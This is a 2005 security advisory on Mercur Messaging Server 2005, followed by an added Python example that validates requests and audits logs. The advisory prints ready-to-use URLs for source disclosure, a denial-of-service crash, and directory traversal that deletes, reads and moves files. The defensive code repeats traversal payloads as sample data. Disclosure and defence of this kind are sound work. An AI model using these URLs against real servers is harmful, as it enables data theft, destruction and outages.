Mercur Messaging 2005 5.0 (SP2) (5010) Multiple Vulnerabilities
2 May 2005

Synopsis:
Dr_insane has discovered multiple remote vulnerabilities in Mercur Messaging Server 2005 that can be exploited to perform denial of service attacks, expose the source code of .ctml files, delete arbitrary folders, delete arbitrary files, create files with controlled content, move arbitrary files, and traverse directories.

Description:

Issue 1:
The first vulnerability is a .ctml source disclosure that can be exploited by malicious people to gain knowledge of sensitive information. It is possible to disclose the source code of ".ctml" pages by appending a URL-encoded space ("%20") to the end of the file extension of the requested resource.

Issue 2:
The second vulnerability is a denial of service that can be triggered to crash the server under certain circumstances. By appending a URL-encoded character to the end of a ".ctml" file name it is possible to crash the server.

example:
http://[host]:1080/start.ctml%20?Session.Id=[cookie]
http://[host]:1080/start.ctml%asd?Session.Id=[cookie]
http://[host]:1080/start.ctml%20?Session.Id=[cookie]
(You have to request each of the above strings multiple times to crash the server.)

Issue 3:
There is also a number of vulnerabilities that can be exploited to delete files and folders, read arbitrary files and create files with controlled content. The problem exists because the "Folder.Id" and "Message.Id" parameters do not validate the data they accept.

example:

delete folder:
--------------
(The URL below will delete the specified folder on drive C:)
http://[host]:1080/deletefolder.ctml?Session.Id=[value]&Folder.Id=/../../../../../../../../../../../../../../../../../[some_folder]

delete file:
------------
(The URL below will delete a file named "wirelles.doc" in the root of drive C:)
http://[host]:1080/deletemessage.ctml?Session.Id=[host]&Message.Id=wirelles.doc&Session.MessagePage=1&Folder.Type=0&Folder.Id=/../../../../../../../../../../../../../../../../../../../../../../

read file:
----------
(The URLs below will read the specified file)
http://[host]:1080/readmessage.ctml/?Session.Id=[value]&Message.Id=[file]&Folder.Id=/../../../../../../../../../../../../../../../../../../
http://[host]:1080/editmessage.ctml?Session.Id=[cookie]&Message.Id=/../../../../../../../../../../../../../../../../../../../../../../[file]
http://127.0.0.1:1080/origmessage.ctml?Session.Id=[cookie]&Message.Id=[file]&Folder.Id=/../../../../../../../../../../../../../../../../

write files:
------------
It is possible to write files to an arbitrary location with controlled content. Suppose a user creates a mail message with content of his choice and stores it in a new email folder called "xxx". The command below will move the file the user created from email folder xxx into the folder C:\aaa:
http://127.0.0.1:1080/messages.ctml?Session.Id=00000060C.32A29D15.00AC5BC7&Folder.Id=xxx&Folder.Name=xxx&Folder.Type=0&Session.MessagePage=1&Message.Command=Message.MoveToFolder_0_/../../../../../../../../../../../../../../../../../../../aaa&Message.Action=%A0Go%A0&Folder.Name=xxx&Message.SearchText=&Message.Id=115693435810790.out

Issue 4:
Finally, there are cross-site scripting issues in several scripts that can be used to execute arbitrary HTML and script code in a user's browser session in the context of the vulnerable site.

Credit:
Dr_insane
dr_insane(at)pathfinder.gr
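The following is an added defensive example, not part of this advisory and not MERCUR's code. It shows the two server-side checks whose absence the advisory describes: deciding what a request names only after decoding it once (so "start.ctml%20" cannot slip past an extension check and reach a static-file handler, issues 1 and 2), and canonicalising Folder.Id / Message.Id against a mailbox root before touching the filesystem (issue 3). The mailbox root, the script-name allow-list and the sample request lines are assumptions constructed from the advisory's placeholders; the same audit function can be run over real access-log request targets to flag these patterns.

```python
"""Request-validation and log-audit checks for the flaw classes in the
Mercur Messaging 2005 advisory.  Added illustration, not MERCUR code:
the mailbox root, parameter names and sample requests are assumed."""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

MAILBOX_ROOT = "/srv/mercur/mailboxes"            # assumed base directory
SCRIPT_NAME = re.compile(r"[A-Za-z0-9_-]+\.ctml")  # allow-list for script names
PATH_PARAMS = ("Folder.Id", "Message.Id")          # parameters the advisory names


def script_name(raw_path):
    """Decode ONCE, then decide what the request names.  Deciding on the raw
    path (where 'start.ctml%20' does not end in '.ctml') is what lets the
    decoded name fall through to a static-file handler and leak the source."""
    decoded = unquote(raw_path)
    if "%" in decoded or decoded != decoded.strip():
        return None                      # undecodable escape or trailing blank
    if any(ord(c) < 32 for c in decoded):
        return None                      # control characters never belong here
    name = posixpath.basename(decoded)
    return name if SCRIPT_NAME.fullmatch(name) else None


def mailbox_path(user_value):
    """Join a Folder.Id / Message.Id value to the mailbox root and refuse
    anything that normalises to a location outside that root."""
    rel = user_value.replace("\\", "/").lstrip("/")
    if "\0" in rel:
        return None
    full = posixpath.normpath(posixpath.join(MAILBOX_ROOT, rel))
    if full != MAILBOX_ROOT and not full.startswith(MAILBOX_ROOT + "/"):
        return None
    return full


def audit_request(target):
    """Return the reasons a request target (path plus query string) should be
    refused or alerted on; an empty list means it passed these checks."""
    parts = urlsplit(target)
    findings = []
    if script_name(parts.path) is None:
        findings.append("script name rejected: %r" % parts.path)
    params = parse_qs(parts.query, keep_blank_values=True)
    for key, values in params.items():
        for value in values:
            if key in PATH_PARAMS:
                if mailbox_path(value) is None:
                    findings.append("%s escapes mailbox root" % key)
            elif ".." in value.replace("\\", "/").split("/"):
                # e.g. Message.Command=Message.MoveToFolder_0_/../../aaa
                findings.append("traversal sequence in %s" % key)
    return findings


# Constructed request targets modelled on the advisory's examples (not real logs).
SAMPLE_REQUESTS = [
    "/start.ctml?Session.Id=SESSION",
    "/start.ctml%20?Session.Id=SESSION",
    "/start.ctml%asd?Session.Id=SESSION",
    "/deletefolder.ctml?Session.Id=SESSION&Folder.Id=/../../../../../../../some_folder",
    "/messages.ctml?Session.Id=SESSION&Folder.Id=xxx&Folder.Type=0"
    "&Message.Command=Message.MoveToFolder_0_/../../../aaa&Message.Id=115693435810790.out",
]


def audit_all(requests):
    """Map each request target to its findings."""
    return {target: audit_request(target) for target in requests}


if __name__ == "__main__":
    for target, findings in audit_all(SAMPLE_REQUESTS).items():
        print("REJECT" if findings else "ok    ", target, findings)
```

The allow-list in `script_name` is deliberately stricter than "ends with .ctml": a trailing slash, a stray escape such as "%asd", or a decoded blank all yield None, so the handler never has to guess what the client meant. `mailbox_path` works on the normalised string rather than on the live filesystem, which makes the check identical for a folder that does not exist yet (the delete and move cases) and for one that does.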